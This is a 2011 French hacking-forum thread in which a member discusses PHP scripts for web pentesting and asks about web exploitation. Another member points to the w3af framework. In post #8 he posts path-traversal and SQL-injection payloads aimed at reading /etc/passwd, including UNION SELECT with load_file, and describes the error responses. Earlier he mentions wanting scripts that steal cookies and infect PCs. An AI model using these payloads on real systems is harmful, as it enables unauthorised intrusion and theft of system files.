Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-10-2011 21:36:46

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Améliorer des scripts PHP a la recherche de l'exploit

Bonsoir wink


Comme vous avez du le constater depuis que je suis sur ce forum j'aime bien coder de petit script en bash pour automatiser des commandes.Oui mais... je ne m'intérèsse pas qu'au bash heureusement d'ailleurs sinon je serai vraiment un troll big_smile j'ai un second language de prog sous la main qui me fascine c'est le PHP, je ne l'ai pas employé sur ce forum pour la bonne est simple raison que j'en vois pas trop l'utilité si ce n'est faire de jolie Fake page améliorée pour des rogues AP mais ça tout le monde peut le faire en peu de temps.

En faite je m'intérèsse aussi au hacking web c'est un domaine ou le code change fréquemment en fonction de l'admin, c'est vraiment diversifié (j'ai encore surement des choses a apprendre) mais ça me plait bien smile

Voila, je code certains script pour tester la sécu de site web... et en parlant de ça j'aurais besoin de vos lumières sur un projet que je me suis fixé, améliorer tout mes scripts basé sur la sécu pour, qui sait, peut etre atteindre l'exploit dans la mesure du faisable.Pour l'instant j'ai codé un script qui teste divers fonction sur une bdd et un autre qui reverse des pc, rien de bien méchant mais commum.Le reste c'est des scripts basic pour récup d'ip cookies etc... et justement a ce propos j'aimerais améliorer les script de façon a choper plus de choses encore et infecté d'autre pc pour une utilisation avec MODERATION seulement sur son propre serveur et surtout son propre matos.


Comprenez bien que c'est pas pour OWNED des sites web a tout va car ça m'est complètement égal c'est surtout pour savoir jusqu'a quel limite on peut aller dans le domaine du pentesting web, je suis du genre curieux et j'aime m'investir a fond sur quelque chose.


Par contre vu la sensibilité des 2 script en question et le temps que j'ai passer a les codé, je préfère que ceux pour qui le projet bote bien me contacte par courriel pour avoir ces scripts.Vos avis, suggestion, et qualité de codeur m'aideront a progresser dans ma longue quète du pentesting web tongue

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-10-2011 13:47:02

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Améliorer des scripts PHP a la recherche de l'exploit

Super intéressant ! Ces derniers temps je m'intéresse beaucoup a la sécurité web et j'ai lu des tonnes de tuto ainsi qu'appris le PHP. Bref, je m'egare et raconte un peu ma vie la tongue

J'aimerais bien jeter un petit coup d'oeil a tes scripts big_smile


Sharkoff

Hors Ligne

#3 14-10-2011 19:27:25

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Améliorer des scripts PHP a la recherche de l'exploit

Je viens de t'envoyer ça smile

Ps: si vous connaissez de bon site ou ça parle de pentesting web je suis preneur a 100% smile

Hors Ligne

#4 17-10-2011 21:12:59

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Améliorer des scripts PHP a la recherche de l'exploit

Voila, je viens de finir d'améliorer 2 scripts PHP pour du pentest web, part ailleurs j'en fais un autre incluant les derniers exploits dans la matière, vous pouvez me demander mes script si vous voulez en attendant que je finisse le dernier avec les exploits, et sachez que ça ne me dérange pas de mettre mes scripts au service des webmasters si  il y en a qui passent dans le coin wink

Hors Ligne

#5 18-10-2011 22:15:07

NoCrash
Membre d'honneur
Inscription : 09-04-2009
Messages : 148

Re : Améliorer des scripts PHP a la recherche de l'exploit

SI tu t'intéresse réellement au pentest web koala, n'hésite pas à regarder le projet W3AF qui est un Framework d'exploitation des applications Web écrit en Python.
Il est possible de regarder les sources pour comprendre la plupart des exploitations et il est également possible d'y ajouter tes propres modules.

Un lien ? Oui mon bon monsieur : w3af

Hors Ligne

#6 18-10-2011 22:38:23

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Améliorer des scripts PHP a la recherche de l'exploit

Merci NoCrash wink je vais voir ça, la je me tape un defcon 17 de 40mn sur youtube mais bon faut bien roll

Sinon ça fait plaisir de voir un ancien membre revenir smile

Hors Ligne

#7 18-10-2011 22:46:29

NoCrash
Membre d'honneur
Inscription : 09-04-2009
Messages : 148

Re : Améliorer des scripts PHP a la recherche de l'exploit

Avec plaisir wink
ça fait également plaisir de revenir, ça c'est certain smile

Hors Ligne

#8 28-10-2011 12:53:50

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Améliorer des scripts PHP a la recherche de l'exploit

J'ai reçu l'autorisation de pentest un site (c'est pas crack-wifi vous inquiétez pas big_smile ) et après avoir testé pas mal de chose je me suis attaqué a /etc/passwd avec ce genre de code:

..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f
passwd

%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

+union+select+1,(((select/**/concat(0x2d2f2d,(unhex(hex(load_file(0x2f6574632f706173737764)))),0x2d2f2d)))),3,4,5,6,7,8,9--

+and+(select 1)=(select0xcode overflow en héxa.)+union+select+1,2,version(),database(),user(),6,7--

La premier code me donne un joli System Error! Error#3
Le second une erreur 302
Le 3e System Error! Error#0
le 4e une erreur de proxy


Ça fait beaucoup d'erreur je trouve, dois-je en conclure que j'ai trouvé quelque chose d'intéressant?

Hors Ligne

#9 28-10-2011 17:55:32

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Améliorer des scripts PHP a la recherche de l'exploit

hi c un domaine que je commence a exploiter moi aussi entre autres je ne suis pas calé pour te répondre mais j'aimerais savoir comment tu as trouver ceci car la clé est là d'après moi

0x2f6574632f706173737764

tu ne l'as pas mis par hasard ? ou alors je comprend rien smile ce qui est surement le cas !!

Hors Ligne

#10 28-10-2011 18:12:35

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Améliorer des scripts PHP a la recherche de l'exploit

tu ne l'as pas mis par hasard ? ou alors je comprend rien  ce qui est surement le cas !!

Tu as raison de demander wink 0x2f6574632f706173737764 veut dire /etc/passwd.

Hors Ligne

#11 28-10-2011 18:25:55

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Améliorer des scripts PHP a la recherche de l'exploit

y a bon smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]